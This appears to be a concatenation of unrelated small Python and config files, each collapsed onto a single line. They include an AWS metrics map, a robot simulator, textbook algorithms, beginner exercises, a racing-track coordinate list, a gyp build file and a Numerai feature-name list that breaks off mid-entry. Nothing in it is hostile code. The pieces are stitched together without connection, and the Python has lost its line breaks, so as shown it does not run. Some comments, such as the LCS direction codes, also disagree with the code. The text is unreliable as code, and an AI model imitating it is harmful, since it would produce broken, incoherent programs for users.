'HTTPCode_ELB_502_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_503_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_504_Count': ['AWS/ApplicationELB'], 'IPv6ProcessedBytes': ['AWS/ApplicationELB'], 'IPv6RequestCount': ['AWS/ApplicationELB'], 'NewConnectionCount': ['AWS/ApplicationELB'], 'NonStickyRequestCount': ['AWS/ApplicationELB'], 'ProcessedBytes': ['AWS/ApplicationELB'], 'RejectedConnectionCount': ['AWS/ApplicationELB'], 'RequestCount': ['AWS/ApplicationELB'], 'RuleEvaluations': ['AWS/ApplicationELB'], 'HTTPCode_Target_2XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_Target_3XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_Target_4XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_Target_5XX_Count': ['AWS/ApplicationELB'], 'TargetConnectionErrorCount': ['AWS/ApplicationELB'], 'TargetResponseTime': ['AWS/ApplicationELB'], 'TargetTLSNegotiationErrorCount': ['AWS/ApplicationELB'], 'LambdaTargetProcessedBytes': ['AWS/ApplicationELB'], 'ELBAuthError': ['AWS/ApplicationELB'], 'ELBAuthFailure': ['AWS/ApplicationELB'], 'ELBAuthLatency': ['AWS/ApplicationELB'], 'ELBAuthRefreshTokenSuccess': ['AWS/ApplicationELB'], 'ELBAuthSuccess': ['AWS/ApplicationELB'], 'ELBAuthUserClaimsSizeExceeded': ['AWS/ApplicationELB'], }
NORTH, EAST, SOUTH, WEST = range(4) class Compass(object): compass = [NORTH, EAST, SOUTH, WEST] def __init__(self, bearing=NORTH): self.bearing = bearing def left(self): self.bearing = self.compass[self.bearing - 1] def right(self): self.bearing = self.compass[(self.bearing + 1) % 4] class Robot(object): def __init__(self, bearing=NORTH, x=0, y=0): self.compass = Compass(bearing) self.x = x self.y = y def advance(self): if self.bearing == NORTH: self.y += 1 elif self.bearing == SOUTH: self.y -= 1 elif self.bearing == EAST: self.x += 1 elif self.bearing == WEST: self.x -= 1 def turn_left(self): self.compass.left() def turn_right(self): self.compass.right() def simulate(self, commands): instructions = {'A': self.advance, 'R': self.turn_right, 'L': self.turn_left} for cmd in commands: if cmd in instructions: instructions[cmd]() @property def bearing(self): return self.compass.bearing @property def coordinates(self): return (self.x, self.y)
#!/usr/bin/env python # encoding: utf-8 # 函数装饰器 def memp(func): cache = {} def wrap(*args): if args not in cache: cache[args] = func(*args) return cache[args] return wrap # 第一题 @memp def fibonacci(n): if n <= 1: return 1 return fibonacci(n - 1) + fibonacci(n - 2) print(fibonacci(35)) # 第二题 @memp def climb(n, steps): count = 0 if n == 0: count = 1 elif n > 0: for step in steps: count += climb(n - step, steps) return count #print(climb(10, (1, 2, 3)))
class SavingsAccount: '''Defines a savings account''' #static variables RATE = 0.02 MIN_BALANCE = 25 def __init__(self, name, pin, balance = 0.0): self.name = name self.pin = pin self.balance = balance def __str__(self): result = "Name: " + self.name + "\n" result += "PIN: " + self.pin + "\n" result += "Balance: " + str(self.balance) return result def getBalance(self): return self.balance def getName(self): return self.name def getPin(self): return self.pin def deposit(self, amount): '''deposits the amount into our balance''' self.balance += amount def withdraw(self, amount): if amount < 0: return "Amount must be >= 0" if self.balance < amount: return "Insufficient Funds" self.balance -= amount return None def computeInterest(self): interest = self.balance * SavingsAccount.RATE self.deposit(interest) return interest if __name__ == "__main__": sa1 = SavingsAccount("Marc", "1234", 6.50) print(sa1) print(sa1.getBalance()) print(sa1.getName()) print(sa1.getPin()) sa1.deposit(1234.76) sa1.deposit(1852.86) print(sa1.getBalance()) print(sa1.computeInterest())
MICROSERVICES = { # Map locations to their microservices "LOCATION_MICROSERVICES": [ { "module": "intelligence.welcome.location_welcome_microservice", "class": "LocationWelcomeMicroservice" } ] }
''' 最长公共子序列 描述 给定两个字符串,返回两个字符串的最长公共子序列(不是最长公共子字符串),可能是多个。 输入 输入为两行,一行一个字符串 输出 输出如果有多个则分为多行,先后顺序不影响判断。 输入样例 1A2BD3G4H56JK 23EFG4I5J6K7 输出样例 23G456K 23G45JK ''' ''' d为方向矩阵 1:上 2:左上 3:左 4:左or上 ''' def LCS (a, b): C = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # 定义矩阵C保存最长公共子序列长度 d = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # 定义矩阵path保存最长公共子序列查找方向 for i in range(1, len(a) + 1): for j in range(1, len(b) + 1): if a[i - 1] == b[j - 1]: C[i][j] = C[i - 1][j - 1] + 1 d[i][j] = 1 # 左上 elif C[i][j - 1] < C[i - 1][j]: C[i][j] = C[i - 1][j] d[i][j] = 2 # 上 elif C[i][j - 1] > C[i - 1][j]: C[i][j] = C[i][j - 1] d[i][j] = 3 # 左 else: # C[i][j - 1] == C[i - 1][j] C[i][j] = C[i - 1][j] d[i][j] = 4 # 左or上 maxLen = C[len(a)][len(b)] lcs = "" printLCS(d, a, lcs, 1, maxLen, len(a), len(b)) def printLCS (d, a, s, curLen, maxLen, i, j): if i == 0 or j == 0: return None dir = d[i][j] if dir == 1: if curLen == maxLen: s += a[i - 1] s = s[::-1] strDict[s] = i - 1 elif curLen < maxLen: s += a[i - 1] printLCS(d, a, s, curLen + 1, maxLen, i - 1, j - 1) elif dir == 2: printLCS(d, a, s, curLen, maxLen, i - 1, j) elif dir == 3: printLCS(d, a, s, curLen, maxLen, i, j - 1) elif dir == 4: printLCS(d, a, s, curLen, maxLen, i - 1, j) printLCS(d, a, s, curLen, maxLen, i, j - 1) if __name__ == '__main__': a = input().strip() b = input().strip() strDict = dict() LCS(a, b) for key in strDict.keys(): print(key)
ADDRESS_STR = '' PRIVATE_KEY_STR = '' GAS = 210000 GAS_PRICE = 5000000000 SECONDS_LEFT = 25 SELL_AFTER_WIN = False
track_width = 0.6603288840524426 track_original = [(3.9968843292236325, -2.398085115814209), (4.108486819458006, -2.398085115814209), (4.220117408752442, -2.398085115814209), (4.331728619384766, -2.3980848251342772), (4.443350294494627, -2.398085115814209), (4.554988441467286, -2.398085115814209), (4.666571746826172, -2.398085115814209), (4.7781641601562495, -2.398085115814209), (4.8896753768920895, -2.398085115814209), (5.001236978149414, -2.398085115814209), (5.112820671081545, -2.398085115814209), (5.22445222930908, -2.398085115814209), (5.336061114501954, -2.398085115814209), (5.4476612792968755, -2.3980848251342772), (5.559263769531249, -2.398085115814209), (5.670884088134765, -2.398085115814209), (5.782510801696777, -2.398085115814209), (5.894127050781252, -2.398085115814209), (6.00181679534912, -2.398085115814209), (6.173943692016602, -2.398085115814209), (6.345643870544436, -2.398085115814209), (6.537344378662107, -2.398085115814209), (6.768550421142578, -2.398085115814209), (6.98473063659668, -2.398085115814209), (7.162758142089844, -2.398085115814209), (7.274807891845702, -2.398085115814209), (7.3869537597656265, -2.398085115814209), (7.499844155883789, -2.398085115814209), (7.61068235168457, -2.384343028259277), (7.715040710449218, -2.3489811363220214), (7.806151428222655, -2.289116379547119), (7.879453155517577, -2.2083449531555175), (7.931933673095703, -2.1111327667236326), (7.969687957763672, -2.0054785568237286), (8.009337475585937, -1.9026145835876465), (8.063614782714842, -1.8110042839050309), (8.13654327697754, -1.734422282028198), (8.224194903564452, -1.670004508590698), (8.315116873168945, -1.6062793285369872), (8.397656408691406, -1.5321647148132325), (8.462792355346679, -1.44245458984375), (8.509496481323243, -1.3409916938781739), (8.540622875976563, -1.2328676250457764), (8.560585998535156, -1.12199483833313), (8.572986404418945, -1.010168572998047), (8.580685159301758, -0.8628370136260985), (8.583536148071289, -0.7021988536834717), (8.58443454284668, -0.5753229497909546), (8.584472137451172, -0.3747735631942749), (8.584492291259764, -0.19896346716880797), (8.584528335571289, -0.00428482018969953), (8.584556240844726, 0.2119464259147644), (8.58433532409668, 0.3881836337089538), (8.584120608520507, 0.5002564319610595), (8.580803369140625, 0.6122315738677978), (8.571400067138672, 0.7239659116744994), (8.555663430786133, 0.8350995351791382), (8.531425762939453, 0.9447460159301757), (8.500583847045899, 1.0525313941955565), (8.46601541442871, 1.1590160766601563), (8.431132659912109, 1.2648468261718748), (8.40480791015625, 1.3722508808135987), (8.388611611938476, 1.4806030849456786), (8.405742349243162, 1.6502103195190427), (8.463046215820313, 1.8476967147827148), (8.53134553527832, 2.0626024925231934), (8.55994340209961, 2.291900899505615), (8.514377191162108, 2.4563697364807124), (8.426188388061522, 2.610280400085449), (8.300192977905272, 2.7344502433776854), (8.126715969848632, 2.814492935180664), (7.936248913574218, 2.8448311027526856), (7.69728442993164, 2.842157622528076), (7.414035440063476, 2.8335633796691893), (7.165993991088866, 2.8013261032104495), (6.971922503662109, 2.736647105407715), (6.792461752319335, 2.6331662124633786), (6.649091239929199, 2.4822172866821286), (6.649091239929199, 2.4822172866821286), (6.544510801696777, 2.30300177230835), (6.491997534179687, 2.1105175910949705), (6.481333262634276, 1.915810774230957), (6.498144058227538, 1.7427884864807128), (6.531408113098145, 1.5830480915069578), (6.566860212707519, 1.4499332515716552), (6.603410694885254, 1.3282434410095214), (6.641890516662597, 1.2071183731079103), (6.678002847290038, 1.0942358253479), (6.713907051086426, 0.9754661369323733), (6.748999676513671, 0.8351240734100341), (6.771528340148926, 0.6824846742630002), (6.770214854431152, 0.5170887620925904), (6.739964762878418, 0.35214239854812623), (6.678730709838867, 0.20278325449079276), (6.584536071777343, 0.073577370595932), (6.465435395812988, -0.022756241798400884), (6.332671018981934, -0.08443354539871215), (6.192271061706543, -0.11442267904281617), (6.048808113098144, -0.11327295513153077), (5.9084566024780285, -0.0796875414848329), (5.777142330932618, -0.017066400146484362), (5.654321920776367, 0.04993410081863381), (5.543534690856934, 0.08980346956253056), (5.431823098754883, 0.10004641265869134), (5.321303681945801, 0.08101749906539898), (5.223240675354005, 0.0331226148605349), (5.136034951782227, -0.03443096523284911), (5.057559121704101, -0.11292725191116332), (4.981652514648437, -0.19307756190299985), (4.901582789611815, -0.265934788107872), (4.813124816894531, -0.3229467545032501), (4.716816741943359, -0.3564500641271472), (4.6162901260375975, -0.3593997144155204), (4.51511413116455, -0.3368315144300461), (4.416144396972657, -0.29576415982246396), (4.317549252319336, -0.247266593170166), (4.215311694335938, -0.20396510591506956), (4.107997895812988, -0.18035982437133785), (3.999729116821289, -0.184920810508728), (3.8959674270629883, -0.2160716101646423), (3.800001385498047, -0.27164925882816315), (3.709108677673339, -0.33655119952783036), (3.616933296203613, -0.3951910578489304), (3.518029643249511, -0.4385550443172457), (3.4129790786743164, -0.46291566977500914), (3.3047851013183593, -0.4704929507255554), (3.1941414672851565, -0.4655450453758239), (3.0825288032531737, -0.45816466374397274), (2.9700563079833975, -0.4528322554588317), (2.8574543632507323, -0.4456599219322205), (2.7442044929504394, -0.4349176088809967), (2.6292975532531737, -0.4197862710952759), (2.5105101333618163, -0.40448946981430056), (2.3889220123291004, -0.39316141550540923), (2.26488229675293, -0.38975981838703155), (2.1411589378356934, -0.4009938316822052), (2.020786827850342, -0.4341942760944366), (1.8794536911010733, -0.5233404517173774), (1.7949362239837645, -0.6104808813095093), (1.7206921123504637, -0.7506510318756103), (1.6887726943969725, -0.8770849569320678), (1.6724089160919189, -1.0758010009765624), (1.6601904273986814, -1.2993672481536864), (1.6567321598052978, -1.5105078002929688), (1.6593520095825194, -1.6933875289916993), (1.6648058433532715, -1.8153231094360351), (1.6874392971038819, -1.9510643394470213), (1.7280409854888914, -2.050013919830322), (1.7906410888671873, -2.1427592277526855), (1.870859399795532, -2.223833251953125), (1.9645064453124998, -2.2893214057922364), (2.0718011558532714, -2.3412403297424316), (2.18892162322998, -2.375639586639404), (2.3153282485961912, -2.3939165718078614), (2.429082545471191, -2.398216987609863), (2.542245696258545, -2.3981534255981445), (2.6547331130981444, -2.398104203796387), (2.766569309997559, -2.398085115814209), (2.878082949066162, -2.398085115814209), (2.990368634033203, -2.398085115814209), (3.102650637054443, -2.398085115814209), (3.214940197753906, -2.398085115814209), (3.3272259796142576, -2.398085115814209), (3.438768783569336, -2.398085115814209), (3.5503902648925783, -2.398085115814209), (3.6620016693115236, -2.398085115814209), (3.7736411727905272, -2.3980848251342772), (3.8852564529418943, -2.398085115814209), (3.9968843292236325, -2.398085115814209)]
class DealProposal(object): ''' Holds details about a deal proposed by one player to another. ''' def __init__( self, propose_to_player=None, properties_offered=None, properties_wanted=None, maximum_cash_offered=0, minimum_cash_wanted=0): ''' The 'constructor'. properties_offered and properties_wanted should be passed as lists of property names, for example: [Square.Name.OLD_KENT_ROAD, Square.Name.BOW_STREET] If you offer cash as part of the deal, set maximum_cash_offered and set minimum_cash_wanted to zero. And vice versa if you are willing to pay money as part of the deal. ''' if (not properties_offered): properties_offered = [] if (not properties_wanted): properties_wanted = [] self.propose_to_player = propose_to_player self.properties_offered = properties_offered self.properties_wanted = properties_wanted self.maximum_cash_offered = maximum_cash_offered self.minimum_cash_wanted = minimum_cash_wanted self.proposed_by_player = None def __str__(self): ''' Renders the proposal as a string. ''' return "Offered: {0}. Wanted: {1}".format(self.properties_offered, self.properties_wanted) @property def deal_proposed(self): ''' True if a valid deal was proposed, False if not. ''' return True if (self.properties_offered or self.properties_wanted) else False
email = input() while True: line = input() if line == 'Complete': break args = line.split() command = args[0] if command == 'Make': result = '' if args[1] == 'Upper': for ch in email: if ch.isalpha(): ch = ch.upper() result += ch email = result print(email) else: for ch in email: if ch.isalpha(): ch = ch.lower() result += ch email = result print(email) elif command == 'GetDomain': count = int(args[1]) print(email[-count:]) elif command == 'GetUsername': if '@' not in email: print(f"The email {email} doesn't contain the @ symbol.") continue username = '' for ch in email: if ch == '@': break username += ch print(username) elif command == 'Replace': replace = args[1] while replace in email: email = email.replace(replace, '-') print(email) elif command == 'Encrypt': encrypted = [] for ch in email: encrypted.append(str(ord(ch))) print(' '.join(encrypted))
# B_R_R # M_S_A_W # Accept a string # Encode the received string into unicodes # And decipher the unicodes back to its original form # Convention of assigning characters with unicodes # A - Z ---> 65-90 # a - z ---> 97-122 # ord("A") ---> 65 # chr(65) ---> A # Enter a string to encode in uppercase givenStr=input('What is your word in mind(in uppercase please): ').upper() # Print encoded unicodes secretStr='' normStr='' for char in givenStr: secretStr+=str(ord(char)) print("The encrypted string is --->", secretStr) # Cycle through each charcter code 2 at a time for i in range(0,(len(secretStr)-1),2): charCode=secretStr[i]+secretStr[i+1] # Decipher the encrypted code normStr+=chr(int(charCode)) # Print original string print(normStr)
# Backtracking is a general algorithm for finding all (or some) solutions to some computational problems, notably # constraint satisfaction problems, that incrementally builds candidates to the solutions, and abandons a candidate # ("backtracks") as soon as it determines that the candidate cannot possibly be completed to a valid solution. # # backtracking vs. dfs # traverse in solution space vs. traverse in data structure space, pruned of dfs def backtracking(self, data, candidate): # pruning if self.reject(data, candidate): return # reach the end if self.accept(data, candidate): return self.output(data, candidate) # drill down for cur_candidate in self.all_extension(data, candidate): # or you can choose to prune here, recursion depth - 1 if not self.should_to_be_pruned(cur_candidate): self.backtracking(data, cur_candidate)
f = open('input.txt').readlines() f = [line.strip().split(')') for line in f] nodes = {} for line in f: nodes[line[1]] = set() nodes['COM'] = set() for line in f: nodes[line[0]].add(line[1]) def predecessors(n): global nodes if n == 'COM': return set([n]) for p in nodes: if n in nodes[p]: return set([n]) | predecessors(p) result = predecessors('YOU') ^ predecessors('SAN') print(len(result)-2)
#Creating a single link list static (Example-1) class Node: def __init__(self): self.data=None self.nxt=None def assign_data(self,val): self.data=val def assign_add(self,addr): self.nxt=addr class ListPrint: def printLinklist(self,tmp): while(tmp): print(tmp.data,end=' ') tmp=tmp.nxt print("") head=Node() #Implementing Head Node head.assign_data(5) node2=Node() node2.assign_data(7) head.assign_add(node2) node3=Node() node3.assign_data(10) node2.assign_add(node3) pr=ListPrint() pr.printLinklist(head)
# a *very* minimal conversion from a bitstream only fpga to fpga binary format # that can be loaded by the qorc-sdk bootloader(v2.1 or above) # 8 word header: # bin version = 0.1 = 0x00000001 # bitstream size = 75960 = 0x000128B8 # bitstream crc = 0x0 (not used) # meminit size = 0x0 (not used) # meminit crc = 0x0 (not used) # iomux size = 0x0 (not used) # iomux crc = 0x0 (not used) # reserved = 0x0 (not used) header = [ 0x00000001, 0x000128B8, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000 ] fpga_binary_bytearray = bytearray() # add header bytes for each_word in header: fpga_binary_bytearray.extend(int(each_word).to_bytes(4, "little")) # add bitstream content with open('usb2serial.bit', 'rb') as fpga_bitstream: fpga_binary_bytearray.extend(fpga_bitstream.read()) # other content is zero length, save binary: with open('usb2serial_fpga.bin', 'wb') as fpga_binary: fpga_binary.write(fpga_binary_bytearray)
class WrapperBase(object): def __init__(self, instance_to_wrap): self.wrapped = instance_to_wrap def __getattr__(self, item): assert item not in dir(self) return self.wrapped.__getattribute__(item)
# coding: utf-8 """ Common utilities for the Widgets. """ TYPE_BTN_CONFIRM = "\u25a3" TYPE_BTN_REJECT = "\u25c9" TYPE_BTN_SELECT = "\u25c8" def make_button_label(label: str, type=TYPE_BTN_CONFIRM, selected: bool = True) -> str: """ Turns any label into a button label standard. :param label: Text :return: button label string """ if selected: ls = "\u25B8" rs = "\u25C2" else: ls = "\u25B9" rs = "\u25C3" return "{ls} {label} {f} {rs}".format(f=type, label=(label or "* ERROR *").strip(), ls=ls, rs=rs)
def busca(inicio, fim, elemento, A): if (fim >= inicio): terco1 = inicio + (fim - inicio) // 3 terco2 = fim - (fim - inicio) // 3 if (A[terco1] == elemento): return terco1 if (A[terco2] == elemento): return terco2 if (elemento < A[terco1]): return busca(inicio, terco1 - 1, elemento, A) elif (elemento > A[terco2]): return busca(terco2 + 1, fim, elemento, A) else: return busca(terco1 + 1, terco2 - 1, elemento, A) return -1 if __name__ == "__main__": # Driver code A = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] n = len(A) elemento = 5 print(busca(0, n - 1, elemento, A)) # 4 elemento = 1 print(busca(0, n - 1, elemento, A)) # 0 elemento = 10 print(busca(0, n - 1, elemento, A)) # 9
for _ in range(int(input())): n = int(input()) a = [int(x) for x in input().split()] b = [int(x) for x in input().split()] s = "" for i in range(n): b[i] -= a[i] for i in range(1,n): s += str(abs(b[i] - b[i - 1])) print("TAK") if (s == s[::-1]) else print("NIE")
#!/usr/bin/python3 class Complex: def __init__(self, realpart, imagpart): self.realpart = realpart self.imagpart = imagpart x = complex(3.0, -4.5) print(x.real, x.imag) class Test: def prt(self): print(self) print(self.__class__) t = Test() t.prt()
__version__ = 0.1 __all__ = [ "secure", "mft", "logfile", "usnjrnl", ]
letra = input("Digite uma letra: ").lower() if letra == "a" or letra == "e" or letra == "i" or letra == "o" or letra == "u" or letra == "ão": print("A letra digitada é uma vogal") else: print("A letra digitada é uma consoante")
def transform_type(val): if val == 'payment': return 3 elif val == 'transfer': return 4 elif val == 'cash_out': return 1 elif val == 'cash_in': return 0 elif val == 'debit': return 2 else: return 0 def transform_nameDest(val): dest = val[0] if dest == 'M': return 1 elif dest == 'C': return 0 else: return 0
class Solution(object): def isPowerOfFour(self, num): """ :type num: int :rtype: bool """ # sketchy but works greaterThanZero = (num > 0) powerOfTwo = ((num & (num - 1)) == 0) oneInOddPosition = ((num & 0x55555555) == num) return greaterThanZero and powerOfTwo and oneInOddPosition
locs, labels = xticks() xticks(locs, ("-10%", "-6.7%", "-3.3%", "0", "3.3%", "6.7%", "10%")) xlabel("Percentage change") ylabel("Number of Stocks") title("Simulated Market Performance")
{ 'targets': [ { 'target_name': 'yajl', 'type': 'static_library', 'sources': [ 'yajl/src/yajl.c', 'yajl/src/yajl_lex.c', 'yajl/src/yajl_parser.c', 'yajl/src/yajl_buf.c', 'yajl/src/yajl_encode.c', 'yajl/src/yajl_gen.c', 'yajl/src/yajl_alloc.c', 'yajl/src/yajl_tree.c', 'yajl/src/yajl_version.c', ], 'cflags': [ '-Wall', '-fvisibility=hidden', '-std=c99', '-pedantic', '-Wpointer-arith', '-Wno-format-y2k', '-Wstrict-prototypes', '-Wmissing-declarations', '-Wnested-externs', '-Wextra', '-Wundef', '-Wwrite-strings', '-Wold-style-definition', '-Wredundant-decls', '-Wno-unused-parameter', '-Wno-sign-compare', '-Wmissing-prototypes', ], 'xcode_settings': { 'OTHER_CFLAGS' : ['<@(_cflags)'], }, 'include_dirs': [ 'include', ], }, ] }
"""Numerai main tournament metadata. Convenience module defining some of the more static variables of the Numerai main tournament. The tournament is constantly evolving. Metadata from this module might be outdated. Retrieving the most recent information using the `fetch_` functions of the `nntm.datasets` module should be preferred. References ---------- https://forum.numer.ai/t/super-massive-data-release-deep-dive/4053 https://forum.numer.ai/t/october-2021-updates/4384 """ TARGET_NAMES_UNIQUE = [ "target_nomi_20", "target_nomi_60", "target_jerome_20", "target_jerome_60", "target_janet_20", "target_janet_60", "target_ben_20", "target_ben_60", "target_alan_20", "target_alan_60", "target_paul_20", "target_paul_60", "target_george_20", "target_george_60", "target_william_20", "target_william_60", "target_arthur_20", "target_arthur_60", "target_thomas_20", "target_thomas_60", ] TARGET_NAMES = ["target"] + TARGET_NAMES_UNIQUE FEATURE_NAMES_LEGACY = [ "feature_unco_terefah_thirster", "feature_enlightening_mirthful_laurencin", "feature_tarry_meet_chapel", "feature_himyarite_tetragonal_deceit", "feature_dovetailed_winy_hanaper", "feature_tortured_arsenical_arable", "feature_unamazed_tumular_photomicrograph", "feature_unsurveyed_boyish_aleph", "feature_phellogenetic_vibrational_jocelyn", "feature_seemlier_reorient_monandry", "feature_unmalleable_resistant_kingston", "feature_lordly_lamellicorn_buxtehude", "feature_antipodal_unable_thievery", "feature_hypersonic_volcanological_footwear", "feature_unspotted_practiced_gland", "feature_casuistic_barbarian_monochromy", "feature_torturesome_estimable_preferrer", "feature_unlawful_superintendent_brunet", "feature_multilinear_sharpened_mouse", "feature_padded_peripteral_pericranium", "feature_antisubmarine_foregoing_cryosurgery", "feature_spagyric_echt_alum", "feature_epidermic_scruffiest_prosperity", "feature_chaldean_vixenly_propylite", "feature_emmetropic_heraclitean_conducting", "feature_telephonic_shakable_bollock", "feature_unapplicable_jerkiest_klemperer", "feature_perceivable_gasiform_psammite", "feature_unrelieved_rawish_cement", "feature_casemated_ibsenian_grantee", "feature_fragrant_fifteen_brian", "feature_apomictical_motorized_vaporisation", "feature_hysteric_mechanized_recklinghausen", "feature_reduplicate_conoid_albite", "feature_softish_unseparated_caudex", "feature_faustian_unventilated_lackluster", "feature_greedier_favorable_enthymeme", "feature_rural_inquisitional_trotline", "feature_mined_game_curse", "feature_smoggy_niftiest_lunch", "feature_paramagnetic_complex_gish", "feature_chaotic_granitoid_theist", "feature_basaltic_arid_scallion", "feature_unrated_intact_balmoral", "feature_revealable_aeonian_elvira", "feature_desiderative_commiserative_epizoa", "feature_subdued_spiffier_kano", "feature_flavourful_seismic_erica", "feature_doggish_whacking_headscarf", "feature_palatalized_unsucceeded_induration", "feature_conceding_ingrate_tablespoonful", "feature_misanthropic_knurliest_freebooty", "feature_inhibited_snowiest_drawing", "feature_induplicate_hoarse_disbursement", "feature_uninclosed_handcrafted_springing", "feature_bleeding_arabesque_pneuma", "feature_incitant_trochoidal_oculist", "feature_cairned_fumiest_ordaining", "feature_huskiest_compartmental_jacquerie", "feature_endangered_unthreaded_firebrick", "feature_epicurean_fetal_seising", "feature_stylistic_honduran_comprador", "feature_hellenistic_scraggly_comfort", "feature_intrusive_effluent_hokkaido", "feature_unnetted_bay_premillennialist", "feature_tossing_denominative_threshing", "feature_vestmental_hoofed_transpose", "feature_unsurveyed_chopped_feldspathoid", "feature_undescribed_methylic_friday", "feature_chartered_conceptual_spitting", "feature_fustiest_voiced_janet", "feature_offshore_defamatory_catalog", "feature_jiggish_tritheist_probity", "feature_quinsied_increased_braincase", "feature_petitionary_evanescent_diallage", "feature_fleshly_bedimmed_enfacement", "feature_zarathustrian_albigensian_itch", "feature_uncompromising_fancy_kyle", "feature_seamier_jansenism_inflator", "feature_levigate_kindly_dyspareunia", "feature_ctenoid_moaning_fontainebleau", "feature_unliving_bit_bengaline", "feature_culinary_pro_offering", "feature_nebule_barmier_bibliomania", "feature_unlivable_morbific_traveling", "feature_peaty_vulgar_branchia", "feature_peculiar_sheenier_quintal", "feature_apostate_impercipient_knighthood", "feature_collective_stigmatic_handfasting", "feature_scenographical_dissentient_trek", "feature_unaimed_yonder_filmland", "feature_recidivism_petitory_methyltestosterone", "feature_unperfect_implemental_cellarage", "feature_incommensurable_diffused_curability", "feature_bloodied_twinkling_andante", "feature_more_hindoo_diageotropism", "feature_uncomplimentary_malignant_scoff", "feature_sorted_ignitable_sagitta", "feature_planar_unessential_bride", "feature_reminiscent_unpained_ukulele", "feature_whistleable_unbedimmed_chokey", "feature_reclaimed_fallibilist_turpentine", "feature_tittering_virgilian_decliner", "feature_travelled_semipermeable_perruquier", "feature_clerkish_flowing_chapati", "feature_oversea_permed_insulter", "feature_congenital_conched_perithecium", "feature_untouchable_unsolvable_agouti", "feature_grazed_blameful_desiderative", "feature_coordinated_undecipherable_gag", "feature_tranquilizing_abashed_glyceria", "feature_irresponsive_compositive_ramson", "feature_attuned_southward_heckle", "feature_supergene_legible_antarthritic", "feature_descendent_decanal_hon", "feature_encompassing_skeptical_salience", "feature_mazy_superrefined_punishment", "feature_whitened_remanent_blast", "feature_intercalative_helvetian_infirmarian", "feature_axillary_reluctant_shorty", "feature_liege_unexercised_ennoblement", "feature_caespitose_unverifiable_intent", "feature_hypothetic_distressing_endemic", "feature_calculating_unenchanted_microscopium", "feature_zymotic_varnished_mulga", "feature_headhunting_unsatisfied_phenomena", "feature_voltairean_consolidative_parallel", "feature_obeisant_vicarial_passibility", "feature_myographic_gawkier_timbale", "feature_diverticular_punjabi_matronship", "feature_impractical_endorsed_tide", "feature_pansophic_merino_pintado", "feature_quadratic_untouched_liberty", "feature_leaky_maroon_pyrometry", "feature_degenerate_officinal_feasibility", "feature_continuate_unprocurable_haversine", "feature_naval_edified_decarbonize", "feature_tonal_graptolitic_corsac", "feature_unbreakable_nosological_comedian", "feature_iconomatic_boozier_age", "feature_unsparred_scarabaeid_anthologist", "feature_unextinct_smectic_isa", "feature_hotfoot_behaviorist_terylene", "feature_crablike_panniered_gloating", "feature_untrimmed_monaxial_accompanist", "feature_unrequired_waxing_skeptic", "feature_buxom_curtained_sienna", "feature_uncertified_myrmecological_nagger", "feature_chopfallen_fasciate_orchidologist", "feature_publishable_apiarian_rollick", "feature_fumarolic_known_sharkskin", "feature_hawkish_domiciliary_duramen", "feature_agronomic_cryptal_advisor", "feature_lost_quirky_botel", "feature_unnourishing_indiscreet_occiput", "feature_galvanometric_sturdied_billingsgate", "feature_undisguised_whatever_gaul", "feature_generative_honorific_tughrik", "feature_venatic_intermetallic_darling", "feature_precooled_inoperable_credence", "feature_autodidactic_gnarlier_pericardium", "feature_glare_factional_assessment", "feature_peltate_okay_info", "feature_syrian_coital_counterproof", "feature_helpable_chanciest_fractionisation", "feature_ovular_powered_neckar", "feature_reconciling_dauby_database", "feature_roiling_trimeric_kurosawa", "feature_gossamer_placable_wycliffite", "feature_exacerbating_presentationism_apagoge", "feature_glyptic_unrubbed_holloway", "feature_centric_shaggier_cranko", "feature_atlantic_uveal_incommunicability", "feature_ruthenian_uncluttered_vocalizing", "feature_camphorated_spry_freemartin", "feature_built_reincarnate_sherbet", "feature_chelonian_pyknic_delphi", "feature_demure_groutiest_housedog", "feature_loyal_fishy_pith", "feature_accessorial_aroused_crochet", "feature_communicatory_unrecommended_velure", "feature_antipathetical_terrorful_ife", "feature_consecrate_legislative_cavitation", "feature_retinoscopy_flinty_wool", "feature_undetermined_idle_aftergrowth", "feature_uretic_seral_decoding", "feature_trim_axial_suffocation", "feature_questionable_diplex_caesarist", "feature_hypogastric_effectual_sunlight", "feature_severe_tricky_pinochle", "feature_methylated_necrophilic_serendipity", "feature_unmoved_alt_spoonerism", "feature_unsparing_moralistic_commissary", "feature_loricate_cryptocrystalline_ethnology", "feature_intended_involute_highbinder", "feature_intertwined_leeriest_suffragette", "feature_merovingian_tenebrism_hartshorn", "feature_rimmed_conditional_archipelago", "feature_irritant_euphuistic_weka", "feature_armoured_finable_skywriter", "feature_subglobular_unsalable_patzer", "feature_caecilian_unexperienced_ova", "feature_substandard_permissible_paresthesia", "feature_scenic_cormophytic_bilirubin", "feature_univalve_abdicant_distrail", "feature_vizierial_courtlier_hampton", "feature_acerb_venusian_piety", "feature_periscopic_thirteenth_cartage", "feature_resuscitative_communicable_brede", "feature_dispiriting_araeostyle_jersey", "feature_roasting_slaked_reposition", "feature_frequentative_participial_waft", "feature_euterpean_frazzled_williamsburg", "feature_kerygmatic_splashed_ziegfeld", "feature_nubblier_plosive_deepening", "feature_springlike_crackjaw_bheesty", "feature_hemispherical_unabsolved_aeolipile", "feature_synoptic_botryose_earthwork", "feature_mucky_loanable_gastrostomy", "feature_sudsy_polymeric_posteriority", "feature_strychnic_structuralist_chital", "feature_patristical_analysable_langouste", "feature_nucleophilic_uremic_endogen", "feature_highland_eocene_berean", "feature_reserved_cleanable_soldan", "feature_cerebrovascular_weeny_advocate", "feature_invalid_chromatographic_cornishman", "feature_groggy_undescried_geosphere", "feature_unbeaten_orological_dentin", "feature_dipped_sent_giuseppe", "feature_salian_suggested_ephemeron", "feature_maximal_unobserving_desalinisation", "feature_biannual_maleficent_thack", "feature_eruptive_seasoned_pharmacognosy", "feature_malacological_differential_defeated", "feature_massed_nonracial_ecclesiologist", "feature_calefactive_anapaestic_jerome", "feature_tribal_germinable_yarraman", "feature_stereotypic_ebracteate_louise", "feature_hexametric_ventricose_limnology", "feature_interdental_mongolian_anarchism", "feature_agile_unrespited_gaucho", "feature_unknown_reusable_cabbage", "feature_chuffier_analectic_conchiolin", "feature_altern_unnoticed_impregnation", 